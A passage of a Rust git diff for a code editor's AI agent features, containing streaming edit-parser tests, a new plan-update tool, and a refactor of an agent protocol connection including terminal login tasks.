test_partial_edit_chunks_hold_back_trailing_newline() { + let mut parser = ToolEditParser::default(); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("before\n".into()), + new_text: Some("after\n".into()), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "before".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "after".into(), + done: false, + }, + ] + ); + + let events = parser.finalize_edits(&[Edit { + old_text: "before\n".into(), + new_text: "after\n".into(), + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "".into(), + done: true, + }] + ); + } + + #[test] + fn test_multiple_edits_sequential() { + let mut parser = ToolEditParser::default(); + + // First edit streams in + let events = parser.push_edits(&[PartialEdit { + old_text: Some("first old".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "first old".into(), + done: false, + }] + ); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("first old".into()), + new_text: Some("first new".into()), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "first new".into(), + done: false, + }, + ] + ); + + // Second edit appears → first edit's new_text is finalized + let events = parser.push_edits(&[ + PartialEdit { + old_text: Some("first old".into()), + new_text: Some("first new".into()), + }, + PartialEdit { + old_text: Some("second".into()), + new_text: None, + }, + ]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "".into(), + done: true, + }, + ToolEditEvent::OldTextChunk { + edit_index: 1, + chunk: "second".into(), + done: false, + }, + ] + ); + + // Finalize everything + let events = parser.finalize_edits(&[ + Edit { + old_text: "first old".into(), + new_text: "first new".into(), + }, + Edit { + old_text: "second old".into(), + new_text: "second new".into(), + }, + ]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 1, + chunk: " old".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 1, + chunk: "second new".into(), + done: true, + }, + ] + ); + } + + #[test] + fn test_content_streamed_incrementally() { + let mut parser = ToolEditParser::default(); + + let events = parser.push_content("hello"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { + chunk: "hello".into(), + }] + ); + + let events = parser.push_content("hello world"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { + chunk: " world".into(), + }] + ); + + // No change + let events = parser.push_content("hello world"); + assert!(events.is_empty()); + + let events = parser.push_content("hello world!"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { chunk: "!".into() }] + ); + + // Finalize with no additional content + let events = parser.finalize_content("hello world!"); + assert!(events.is_empty()); + } + + #[test] + fn test_finalize_content_with_remaining() { + let mut parser = ToolEditParser::default(); + + parser.push_content("partial"); + let events = parser.finalize_content("partial content here"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { + chunk: " content here".into(), + }] + ); + } + + #[test] + fn test_content_trailing_backslash_held_back() { + let mut parser = ToolEditParser::default(); + + // Partial JSON fixer turns incomplete \n into \\ (literal backslash). + // The trailing backslash is held back. + let events = parser.push_content("hello,\\"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { + chunk: "hello,".into(), + }] + ); + + // Next partial corrects the escape to an actual newline. + // The held-back byte was wrong; the correct newline is emitted. + let events = parser.push_content("hello,\n"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { chunk: "\n".into() }] + ); + + // Normal growth. + let events = parser.push_content("hello,\nworld"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { + chunk: "world".into(), + }] + ); + } + + #[test] + fn test_content_finalize_with_trailing_backslash() { + let mut parser = ToolEditParser::default(); + + // Stream a partial with a fixer-corrupted trailing backslash. + // The backslash is held back. + parser.push_content("abc\\"); + + // Finalize reveals the correct character. + let events = parser.finalize_content("abc\n"); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::ContentChunk { chunk: "\n".into() }] + ); + } + + #[test] + fn test_no_partials_direct_finalize() { + let mut parser = ToolEditParser::default(); + + let events = parser.finalize_edits(&[Edit { + old_text: "old".into(), + new_text: "new".into(), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "old".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "new".into(), + done: true, + }, + ] + ); + } + + #[test] + fn test_no_partials_direct_finalize_multiple() { + let mut parser = ToolEditParser::default(); + + let events = parser.finalize_edits(&[ + Edit { + old_text: "first old".into(), + new_text: "first new".into(), + }, + Edit { + old_text: "second old".into(), + new_text: "second new".into(), + }, + ]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "first old".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "first new".into(), + done: true, + }, + ToolEditEvent::OldTextChunk { + edit_index: 1, + chunk: "second old".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 1, + chunk: "second new".into(), + done: true, + }, + ] + ); + } + + #[test] + fn test_old_text_no_growth() { + let mut parser = ToolEditParser::default(); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("same".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "same".into(), + done: false, + }] + ); + + // Same old_text, no new_text → no events + let events = parser.push_edits(&[PartialEdit { + old_text: Some("same".into()), + new_text: None, + }]); + assert!(events.is_empty()); + } + + #[test] + fn test_old_text_none_then_appears() { + let mut parser = ToolEditParser::default(); + + // Edit exists but old_text is None (field hasn't arrived yet) + let events = parser.push_edits(&[PartialEdit { + old_text: None, + new_text: None, + }]); + assert!(events.is_empty()); + + // old_text appears + let events = parser.push_edits(&[PartialEdit { + old_text: Some("text".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "text".into(), + done: false, + }] + ); + } + + #[test] + fn test_empty_old_text_with_new_text() { + let mut parser = ToolEditParser::default(); + + // old_text is empty, new_text appears immediately + let events = parser.push_edits(&[PartialEdit { + old_text: Some("".into()), + new_text: Some("inserted".into()), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "inserted".into(), + done: false, + }, + ] + ); + } + + #[test] + fn test_three_edits_streamed() { + let mut parser = ToolEditParser::default(); + + // Stream first edit + parser.push_edits(&[PartialEdit { + old_text: Some("a".into()), + new_text: Some("A".into()), + }]); + + // Second edit appears + parser.push_edits(&[ + PartialEdit { + old_text: Some("a".into()), + new_text: Some("A".into()), + }, + PartialEdit { + old_text: Some("b".into()), + new_text: Some("B".into()), + }, + ]); + + // Third edit appears + let events = parser.push_edits(&[ + PartialEdit { + old_text: Some("a".into()), + new_text: Some("A".into()), + }, + PartialEdit { + old_text: Some("b".into()), + new_text: Some("B".into()), + }, + PartialEdit { + old_text: Some("c".into()), + new_text: None, + }, + ]); + + // Should finalize edit 1 (index=1) and start edit 2 (index=2) + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::NewTextChunk { + edit_index: 1, + chunk: "".into(), + done: true, + }, + ToolEditEvent::OldTextChunk { + edit_index: 2, + chunk: "c".into(), + done: false, + }, + ] + ); + + // Finalize + let events = parser.finalize_edits(&[ + Edit { + old_text: "a".into(), + new_text: "A".into(), + }, + Edit { + old_text: "b".into(), + new_text: "B".into(), + }, + Edit { + old_text: "c".into(), + new_text: "C".into(), + }, + ]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 2, + chunk: "".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 2, + chunk: "C".into(), + done: true, + }, + ] + ); + } + + #[test] + fn test_finalize_with_unseen_old_text() { + let mut parser = ToolEditParser::default(); + + // Only saw partial old_text, never saw new_text in partials + parser.push_edits(&[PartialEdit { + old_text: Some("partial".into()), + new_text: None, + }]); + + let events = parser.finalize_edits(&[Edit { + old_text: "partial old text".into(), + new_text: "replacement".into(), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: " old text".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "replacement".into(), + done: true, + }, + ] + ); + } + + #[test] + fn test_finalize_with_partially_seen_new_text() { + let mut parser = ToolEditParser::default(); + + parser.push_edits(&[PartialEdit { + old_text: Some("old".into()), + new_text: Some("partial".into()), + }]); + + let events = parser.finalize_edits(&[Edit { + old_text: "old".into(), + new_text: "partial new text".into(), + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: " new text".into(), + done: true, + }] + ); + } + + #[test] + fn test_repeated_pushes_with_no_change() { + let mut parser = ToolEditParser::default(); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("stable".into()), + new_text: Some("also stable".into()), + }]); + assert_eq!(events.len(), 2); // old done + new chunk + + // Push the exact same data again + let events = parser.push_edits(&[PartialEdit { + old_text: Some("stable".into()), + new_text: Some("also stable".into()), + }]); + assert!(events.is_empty()); + + // And again + let events = parser.push_edits(&[PartialEdit { + old_text: Some("stable".into()), + new_text: Some("also stable".into()), + }]); + assert!(events.is_empty()); + } + + #[test] + fn test_old_text_trailing_backslash_held_back() { + let mut parser = ToolEditParser::default(); + + // Partial-json-fixer produces a literal backslash when the JSON stream + // cuts in the middle of an escape sequence like \n. The parser holds + // back the trailing backslash instead of emitting it. + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hello,\\".into()), // fixer closed incomplete \n as \\ + new_text: None, + }]); + // The trailing `\` is held back — only "hello," is emitted. + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "hello,".into(), + done: false, + }] + ); + + // Next partial: the fixer corrects the escape to \n. + // Because edit text also holds back a trailing newline, nothing new + // is emitted yet. + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hello,\n".into()), + new_text: None, + }]); + assert!(events.is_empty()); + + // Continue normally. The held-back newline is emitted together with the + // next content once it is no longer trailing. + let events = parser.push_edits(&[PartialEdit { + old_text: Some("hello,\nworld".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "\nworld".into(), + done: false, + }] + ); + } + + #[test] + fn test_multiline_old_and_new_text() { + let mut parser = ToolEditParser::default(); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("line1\nline2".into()), + new_text: None, + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "line1\nline2".into(), + done: false, + }] + ); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("line1\nline2\nline3".into()), + new_text: Some("LINE1\n".into()), + }]); + assert_eq!( + events.as_slice(), + &[ + ToolEditEvent::OldTextChunk { + edit_index: 0, + chunk: "\nline3".into(), + done: true, + }, + ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "LINE1".into(), + done: false, + }, + ] + ); + + let events = parser.push_edits(&[PartialEdit { + old_text: Some("line1\nline2\nline3".into()), + new_text: Some("LINE1\nLINE2\nLINE3".into()), + }]); + assert_eq!( + events.as_slice(), + &[ToolEditEvent::NewTextChunk { + edit_index: 0, + chunk: "\nLINE2\nLINE3".into(), + done: false, + }] + ); + } +} diff --git a/crates/agent/src/tools/update_plan_tool.rs b/crates/agent/src/tools/update_plan_tool.rs new file mode 100644 index 0000000000000000000000000000000000000000..8d45f8aad42a8cb10b3164212e1cde2b0104bdc2 --- /dev/null +++ b/crates/agent/src/tools/update_plan_tool.rs @@ -0,0 +1,224 @@ +use crate::{AgentTool, ToolCallEventStream, ToolInput}; +use agent_client_protocol as acp; +use gpui::{App, SharedString, Task}; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; +use std::sync::Arc; + +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] +#[serde(rename_all = "snake_case")] +#[schemars(inline)] +pub enum PlanEntryStatus { + /// The task has not started yet. + Pending, + /// The task is currently being worked on. + InProgress, + /// The task has been successfully completed. + Completed, +} + +impl From for acp::PlanEntryStatus { + fn from(value: PlanEntryStatus) -> Self { + match value { + PlanEntryStatus::Pending => acp::PlanEntryStatus::Pending, + PlanEntryStatus::InProgress => acp::PlanEntryStatus::InProgress, + PlanEntryStatus::Completed => acp::PlanEntryStatus::Completed, + } + } +} + +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] +pub struct PlanItem { + /// Human-readable description of what this task aims to accomplish. + pub step: String, + /// The current status of this task. + pub status: PlanEntryStatus, +} + +impl From for acp::PlanEntry { + fn from(value: PlanItem) -> Self { + acp::PlanEntry::new( + value.step, + acp::PlanEntryPriority::Medium, + value.status.into(), + ) + } +} + +/// Updates the task plan. +/// +/// Provide a list of plan entries, each with a step and status. +#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] +pub struct UpdatePlanToolInput { + /// The list of plan entries and their current statuses. + pub plan: Vec, +} + +pub struct UpdatePlanTool; + +impl UpdatePlanTool { + fn to_plan(input: UpdatePlanToolInput) -> acp::Plan { + acp::Plan::new(input.plan.into_iter().map(Into::into).collect()) + } +} + +impl AgentTool for UpdatePlanTool { + type Input = UpdatePlanToolInput; + type Output = String; + + const NAME: &'static str = "update_plan"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Think + } + + fn initial_title( + &self, + input: Result, + _cx: &mut App, + ) -> SharedString { + match input { + Ok(input) if input.plan.is_empty() => "Clear plan".into(), + Ok(_) | Err(_) => "Update plan".into(), + } + } + + fn run( + self: Arc, + input: ToolInput, + event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + cx.spawn(async move |_cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + event_stream.update_plan(Self::to_plan(input)); + + Ok("Plan updated".to_string()) + }) + } + + fn replay( + &self, + input: Self::Input, + _output: Self::Output, + event_stream: ToolCallEventStream, + _cx: &mut App, + ) -> anyhow::Result<()> { + event_stream.update_plan(Self::to_plan(input)); + Ok(()) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::ToolCallEventStream; + use gpui::TestAppContext; + use pretty_assertions::assert_eq; + + fn sample_input() -> UpdatePlanToolInput { + UpdatePlanToolInput { + plan: vec![ + PlanItem { + step: "Inspect the existing tool wiring".to_string(), + status: PlanEntryStatus::Completed, + }, + PlanItem { + step: "Implement the update_plan tool".to_string(), + status: PlanEntryStatus::InProgress, + }, + PlanItem { + step: "Add tests".to_string(), + status: PlanEntryStatus::Pending, + }, + ], + } + } + + #[gpui::test] + async fn test_run_emits_plan_event(cx: &mut TestAppContext) { + let tool = Arc::new(UpdatePlanTool); + let (event_stream, mut event_rx) = ToolCallEventStream::test(); + + let input = sample_input(); + let result = cx + .update(|cx| tool.run(ToolInput::resolved(input.clone()), event_stream, cx)) + .await + .expect("tool should succeed"); + + assert_eq!(result, "Plan updated".to_string()); + + let plan = event_rx.expect_plan().await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "Inspect the existing tool wiring", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::Completed, + ), + acp::PlanEntry::new( + "Implement the update_plan tool", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Add tests", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::Pending, + ), + ]) + ); + } + + #[gpui::test] + async fn test_replay_emits_plan_event(cx: &mut TestAppContext) { + let tool = UpdatePlanTool; + let (event_stream, mut event_rx) = ToolCallEventStream::test(); + + let input = sample_input(); + + cx.update(|cx| { + tool.replay(input.clone(), "Plan updated".to_string(), event_stream, cx) + .expect("replay should succeed"); + }); + + let plan = event_rx.expect_plan().await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "Inspect the existing tool wiring", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::Completed, + ), + acp::PlanEntry::new( + "Implement the update_plan tool", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Add tests", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::Pending, + ), + ]) + ); + } + + #[gpui::test] + async fn test_initial_title(cx: &mut TestAppContext) { + let tool = UpdatePlanTool; + + let title = cx.update(|cx| tool.initial_title(Ok(sample_input()), cx)); + assert_eq!(title, SharedString::from("Update plan")); + + let title = + cx.update(|cx| tool.initial_title(Ok(UpdatePlanToolInput { plan: Vec::new() }), cx)); + assert_eq!(title, SharedString::from("Clear plan")); + } +} diff --git a/crates/agent_servers/Cargo.toml b/crates/agent_servers/Cargo.toml index 4d34632a248c5db35666e93cb068c7ec6727fc48..7151f0084b1cb7d9b206f57551ce715ef67483f7 100644 --- a/crates/agent_servers/Cargo.toml +++ b/crates/agent_servers/Cargo.toml @@ -30,8 +30,8 @@ env_logger = { workspace = true, optional = true } fs.workspace = true futures.workspace = true gpui.workspace = true +feature_flags.workspace = true gpui_tokio = { workspace = true, optional = true } -credentials_provider.workspace = true google_ai.workspace = true http_client.workspace = true indoc.workspace = true @@ -52,6 +52,7 @@ terminal.workspace = true uuid.workspace = true util.workspace = true watch.workspace = true +zed_credentials_provider.workspace = true [target.'cfg(unix)'.dependencies] libc.workspace = true @@ -61,7 +62,7 @@ nix.workspace = true client = { workspace = true, features = ["test-support"] } env_logger.workspace = true fs.workspace = true -language.workspace = true + indoc.workspace = true acp_thread = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } diff --git a/crates/agent_servers/src/acp.rs b/crates/agent_servers/src/acp.rs index c63e4fab2201671fa6448e9d58f6c925c2c91cd8..5f452bc9c0e2e9c2322042583295894a5866b053 100644 --- a/crates/agent_servers/src/acp.rs +++ b/crates/agent_servers/src/acp.rs @@ -7,20 +7,22 @@ use action_log::ActionLog; use agent_client_protocol::{self as acp, Agent as _, ErrorCode}; use anyhow::anyhow; use collections::HashMap; +use feature_flags::{AcpBetaFeatureFlag, FeatureFlagAppExt as _}; use futures::AsyncBufReadExt as _; use futures::io::BufReader; -use project::Project; -use project::agent_server_store::{AgentServerCommand, GEMINI_NAME}; +use project::agent_server_store::AgentServerCommand; +use project::{AgentId, Project}; use serde::Deserialize; use settings::Settings as _; -use task::ShellBuilder; +use task::{ShellBuilder, SpawnInTerminal}; use util::ResultExt as _; +use util::path_list::PathList; use util::process::Child; use std::path::PathBuf; use std::process::Stdio; +use std::rc::Rc; use std::{any::Any, cell::RefCell}; -use std::{path::Path, rc::Rc}; use thiserror::Error; use anyhow::{Context as _, Result}; @@ -30,17 +32,21 @@ use acp_thread::{AcpThread, AuthRequired, LoadError, TerminalProviderEvent}; use terminal::TerminalBuilder; use terminal::terminal_settings::{AlternateScroll, CursorShape, TerminalSettings}; +use crate::GEMINI_ID; + +pub const GEMINI_TERMINAL_AUTH_METHOD_ID: &str = "spawn-gemini-cli"; + #[derive(Debug, Error)] #[error("Unsupported version")] pub struct UnsupportedVersion; pub struct AcpConnection { - server_name: SharedString, - display_name: SharedString, + id: AgentId, telemetry_id: SharedString, connection: Rc, sessions: Rc>>, auth_methods: Vec, + command: AgentServerCommand, agent_capabilities: acp::AgentCapabilities, default_mode: Option, default_model: Option, @@ -124,13 +130,14 @@ impl AgentSessionList for AcpSessionList { .into_iter() .map(|s| AgentSessionInfo { session_id: s.session_id, - cwd: Some(s.cwd), + work_dirs: Some(PathList::new(&[s.cwd])), title: s.title.map(Into::into), updated_at: s.updated_at.and_then(|date_str| { chrono::DateTime::parse_from_rfc3339(&date_str) .ok() .map(|dt| dt.with_timezone(&chrono::Utc)) }), + created_at: None, meta: s.meta, }) .collect(), @@ -157,8 +164,8 @@ impl AgentSessionList for AcpSessionList { } pub async fn connect( - server_name: SharedString, - display_name: SharedString, + agent_id: AgentId, + project: Entity, command: AgentServerCommand, default_mode: Option, default_model: Option, @@ -166,8 +173,8 @@ pub async fn connect( cx: &mut AsyncApp, ) -> Result> { let conn = AcpConnection::stdio( - server_name, - display_name, + agent_id, + project, command.clone(), default_mode, default_model, @@ -182,8 +189,8 @@ const MINIMUM_SUPPORTED_VERSION: acp::ProtocolVersion = acp::ProtocolVersion::V1 impl AcpConnection { pub async fn stdio( - server_name: SharedString, - display_name: SharedString, + agent_id: AgentId, + project: Entity, command: AgentServerCommand, default_mode: Option, default_model: Option, @@ -195,6 +202,19 @@ impl AcpConnection { let mut child = builder.build_std_command(Some(command.path.display().to_string()), &command.args); child.envs(command.env.iter().flatten()); + if let Some(cwd) = project.update(cx, |project, cx| { + if project.is_local() { + project + .default_path_list(cx) + .ordered_paths() + .next() + .cloned() + } else { + None + } + }) { + child.current_dir(cwd); + } let mut child = Child::spawn(child, Stdio::piped(), Stdio::piped(), Stdio::piped())?; let stdout = child.stdout.take().context("Failed to take stdout")?; @@ -269,7 +289,7 @@ impl AcpConnection { cx.update(|cx| { AcpConnectionRegistry::default_global(cx).update(cx, |registry, cx| { - registry.set_active_connection(server_name.clone(), &connection, cx) + registry.set_active_connection(agent_id.clone(), &connection, cx) }); }); @@ -278,10 +298,11 @@ impl AcpConnection { acp::InitializeRequest::new(acp::ProtocolVersion::V1) .client_capabilities( acp::ClientCapabilities::new() - .fs(acp::FileSystemCapability::new() + .fs(acp::FileSystemCapabilities::new() .read_text_file(true) .write_text_file(true)) .terminal(true) + .auth(acp::AuthCapabilities::new().terminal(true)) // Experimental: Allow for rendering terminal output from the agents .meta(acp::Meta::from_iter([ ("terminal_output".into(), true.into()), @@ -304,7 +325,7 @@ impl AcpConnection { // Use the one the agent provides if we have one .map(|info| info.name.into()) // Otherwise, just use the name - .unwrap_or_else(|| server_name.clone()); + .unwrap_or_else(|| agent_id.0.to_string().into()); let session_list = if response .agent_capabilities @@ -320,9 +341,9 @@ impl AcpConnection { }; // TODO: Remove this override once Google team releases their official auth methods - let auth_methods = if server_name == GEMINI_NAME { + let auth_methods = if agent_id.0.as_ref() == GEMINI_ID { let mut args = command.args.clone(); - args.retain(|a| a != "--experimental-acp"); + args.retain(|a| a != "--experimental-acp" && a != "--acp"); let value = serde_json::json!({ "label": "gemini /auth", "command": command.path.to_string_lossy().into_owned(), @@ -330,19 +351,19 @@ impl AcpConnection { "env": command.env.clone().unwrap_or_default(), }); let meta = acp::Meta::from_iter([("terminal-auth".to_string(), value)]); - vec![ - acp::AuthMethod::new("spawn-gemini-cli", "Login") + vec![acp::AuthMethod::Agent( + acp::AuthMethodAgent::new(GEMINI_TERMINAL_AUTH_METHOD_ID, "Login") .description("Login with your Google or Vertex AI account") .meta(meta), - ] + )] } else { response.auth_methods }; Ok(Self { + id: agent_id, auth_methods, + command, connection, - server_name, - display_name, telemetry_id, sessions, agent_capabilities: response.agent_capabilities, @@ -360,6 +381,102 @@ impl AcpConnection { pub fn prompt_capabilities(&self) -> &acp::PromptCapabilities { &self.agent_capabilities.prompt_capabilities } + + fn apply_default_config_options( + &self, + session_id: &acp::SessionId, + config_options: &Rc>>, + cx: &mut AsyncApp, + ) { + let id = self.id.clone(); + let defaults_to_apply: Vec<_> = { + let config_opts_ref = config_options.borrow(); + config_opts_ref + .iter() + .filter_map(|config_option| { + let default_value = self.default_config_options.get(&*config_option.id.0)?; + + let is_valid = match &config_option.kind { + acp::SessionConfigKind::Select(select) => match &select.options { + acp::SessionConfigSelectOptions::Ungrouped(options) => options + .iter() + .any(|opt| &*opt.value.0 == default_value.as_str()), + acp::SessionConfigSelectOptions::Grouped(groups) => { + groups.iter().any(|g| { + g.options + .iter() + .any(|opt| &*opt.value.0 == default_value.as_str()) + }) + } + _ => false, + }, + _ => false, + }; + + if is_valid { + let initial_value = match &config_option.kind { + acp::SessionConfigKind::Select(select) => { + Some(select.current_value.clone()) + } + _ => None, + }; + Some(( + config_option.id.clone(), + default_value.clone(), + initial_value, + )) + } else { + log::warn!( + "`{}` is not a valid value for config option `{}` in {}", + default_value, + config_option.id.0, + id + ); + None + } + }) + .collect() + }; + + for (config_id, default_value, initial_value) in defaults_to_apply { + cx.spawn({ + let default_value_id = acp::SessionConfigValueId::new(default_value.clone()); + let session_id = session_id.clone(); + let config_id_clone = config_id.clone(); + let config_opts = config_options.clone(); + let conn = self.connection.clone(); + async move |_| { + let result = conn + .set_session_config_option(acp::SetSessionConfigOptionRequest::new( + session_id, + config_id_clone.clone(), + default_value_id, + )) + .await + .log_err(); + + if result.is_none() { + if let Some(initial) = initial_value { + let mut opts = config_opts.borrow_mut(); + if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id_clone) { + if let acp::SessionConfigKind::Select(select) = &mut opt.kind { + select.current_value = initial; + } + } + } + } + } + }) + .detach(); + + let mut opts = config_options.borrow_mut(); + if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id) { + if let acp::SessionConfigKind::Select(select) = &mut opt.kind { + select.current_value = acp::SessionConfigValueId::new(default_value); + } + } + } + } } impl Drop for AcpConnection { @@ -368,7 +485,69 @@ impl Drop for AcpConnection { } } +fn terminal_auth_task_id(agent_id: &AgentId, method_id: &acp::AuthMethodId) -> String { + format!("external-agent-{}-{}-login", agent_id.0, method_id.0) +} + +fn terminal_auth_task( + command: &AgentServerCommand, + agent_id: &AgentId, + method: &acp::AuthMethodTerminal, +) -> SpawnInTerminal { + let mut args = command.args.clone(); + args.extend(method.args.clone()); + + let mut env = command.env.clone().unwrap_or_default(); + env.extend(method.env.clone()); + + acp_thread::build_terminal_auth_task( + terminal_auth_task_id(agent_id, &method.id), + method.name.clone(), + command.path.to_string_lossy().into_owned(), + args, + env, + ) +} + +/// Used to support the _meta method prior to stabilization +fn meta_terminal_auth_task( + agent_id: &AgentId, + method_id: &acp::AuthMethodId, + method: &acp::AuthMethod, +) -> Option { + #[derive(Deserialize)] + struct MetaTerminalAuth { + label: String, + command: String, + #[serde(default)] + args: Vec, + #[serde(default)] + env: HashMap, + } + + let meta = match method { + acp::AuthMethod::EnvVar(env_var) => env_var.meta.as_ref(), + acp::AuthMethod::Terminal(terminal) => terminal.meta.as_ref(), + acp::AuthMethod::Agent(agent) => agent.meta.as_ref(), + _ => None, + }?; + let terminal_auth = + serde_json::from_value::(meta.get("terminal-auth")?.clone()).ok()?; + + Some(acp_thread::build_terminal_auth_task( + terminal_auth_task_id(agent_id, method_id), + terminal_auth.label.clone(), + terminal_auth.command, + terminal_auth.args, + terminal_auth.env, + )) +} + impl AgentConnection for AcpConnection { + fn agent_id(&self) -> AgentId { + self.id.clone() + } + fn telemetry_id(&self) -> SharedString { self.telemetry_id.clone() } @@ -376,16 +555,19 @@ impl AgentConnection for AcpConnection { fn new_session( self: Rc, project: Entity, - cwd: &Path, + work_dirs: PathList, cx: &mut App, ) -> Task>> { - let name = self.server_name.clone(); - let cwd = cwd.to_path_buf(); + // TODO: remove this once ACP supports multiple working directories + let Some(cwd) = work_dirs.ordered_paths().next().cloned() else { + return Task::ready(Err(anyhow!("Working directory cannot be empty"))); + }; + let name = self.id.0.clone(); let mcp_servers = mcp_servers_for_project(&project, cx); cx.spawn(async move |cx| { let response = self.connection - .new_session(acp::NewSessionRequest::new(cwd).mcp_servers(mcp_servers)) + .new_session(acp::NewSessionRequest::new(cwd.clone()).mcp_servers(mcp_servers)) .await .map_err(map_acp_error)?; @@ -470,96 +652,15 @@ impl AgentConnection for AcpConnection { } if let Some(config_opts) = config_options.as_ref() { - let defaults_to_apply: Vec<_> = { - let config_opts_ref = config_opts.borrow(); - config_opts_ref - .iter() - .filter_map(|config_option| { - let default_value = self.default_config_options.get(&*config_option.id.0)?; - - let is_valid = match &config_option.kind { - acp::SessionConfigKind::Select(select) => match &select.options { - acp::SessionConfigSelectOptions::Ungrouped(options) => { - options.iter().any(|opt| &*opt.value.0 == default_value.as_str()) - } - acp::SessionConfigSelectOptions::Grouped(groups) => groups - .iter() - .any(|g| g.options.iter().any(|opt| &*opt.value.0 == default_value.as_str())), - _ => false, - }, - _ => false, - }; - - if is_valid { - let initial_value = match &config_option.kind { - acp::SessionConfigKind::Select(select) => { - Some(select.current_value.clone()) - } - _ => None, - }; - Some((config_option.id.clone(), default_value.clone(), initial_value)) - } else { - log::warn!( - "`{}` is not a valid value for config option `{}` in {}", - default_value, - config_option.id.0, - name - ); - None - } - }) - .collect() - }; - - for (config_id, default_value, initial_value) in defaults_to_apply { - cx.spawn({ - let default_value_id = acp::SessionConfigValueId::new(default_value.clone()); - let session_id = response.session_id.clone(); - let config_id_clone = config_id.clone(); - let config_opts = config_opts.clone(); - let conn = self.connection.clone(); - async move |_| { - let result = conn - .set_session_config_option( - acp::SetSessionConfigOptionRequest::new( - session_id, - config_id_clone.clone(), - default_value_id, - ), - ) - .await - .log_err(); - - if result.is_none() { - if let Some(initial) = initial_value { - let mut opts = config_opts.borrow_mut(); - if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id_clone) { - if let acp::SessionConfigKind::Select(select) = - &mut opt.kind - { - select.current_value = initial; - } - } - } - } - } - }) - .detach(); - - let mut opts = config_opts.borrow_mut(); - if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id) { - if let acp::SessionConfigKind::Select(select) = &mut opt.kind { - select.current_value = acp::SessionConfigValueId::new(default_value); - } 